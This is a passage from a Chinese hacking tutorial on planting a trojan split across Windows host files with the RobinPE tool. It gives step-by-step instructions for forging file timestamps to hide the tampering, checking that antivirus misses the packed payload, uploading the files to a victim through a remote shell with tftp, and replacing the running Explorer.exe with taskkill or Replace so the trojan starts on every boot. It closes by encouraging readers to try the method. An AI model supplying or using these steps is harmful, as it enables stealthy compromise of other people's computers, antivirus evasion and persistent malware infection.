见缝插针 伪造木马——RobinPE

3.修改文件时间

由于植入木马后，启动文件和宿主文件的文件创建和修改日期会发生变化，因此我们需要将文件时间修改恢复原样。在RobinPE中自带了一个叫作“时空机器”的工具，可以修改文件的时间和日期。在文件框中浏览输入文件路径和文件名，然后在界面下方设置程序文件的创建时间和修改时间，最后点击“确认修改”即可（如图4）。

图4

四、上传木马文件

先在本地用金山和瑞星杀毒软件扫描一下被植入木马的启动文件和几个宿主文件，扫描结果未提示有病毒。本来嘛，病毒已经加过壳而且现在被分解了，怎么可能查得出来呢？

现在用TFTPD32.exe在本地建立了一个TFTP服务器（如图5），在远程目标主机的Shell中输入如下命令：“tftp -i 本机IP get 上传文件”，将所有植入木马的文件上传到目标主机的任意目录下。

图5

五、运行木马

现在需要将上传的文件全部复制到对方的“System”目录下，其中除了宿主文件“Explorer.exe”文件外，其它文件都可以直接复制过去。而“Explorer.exe”文件由于正在运行中，因此无法通过复制替换掉。可以采用两种方法：

1.使用“taskkill”命令杀掉“Explorer.exe”进程，输入命令格式如下：“taskkill /F /IM Explorer.exe”。然后再将上传的Explorer.exe文件复制到“System”目录下，运行“explorer”重新运行此命令，木马就在后台悄悄运行了。

2.使用Windows中的“Replace”命令，此命令可以替换掉正在运行中的程序和文件。如图6所示在目标主机Shell中输入命令“Replace c:\windows\system\Explorer.exe c:\temp\”（这里假设“Explorer.exe”上传在c:\temp文件夹下。），就可以用上传的“Explorer.exe”文件替换掉正在运行的程序文件了。重启系统以后，木马就会随“Explorer.exe”自动运行了。

图6

看了上面的方法，大家是不是感觉到又有了一种新思路？将木马分体植入几个文件中，不改变文件的大小，可以有效的躲过查杀；而替换掉系统必调用的程序，使得每次系统启动都会自动运行我们的木马，比将木马添加到注册表启动键值中或放入系统启动程序组中要隐蔽得多了。为植入木马犯愁的朋友不妨可以试一试这个方法。

上一页  [1] [2]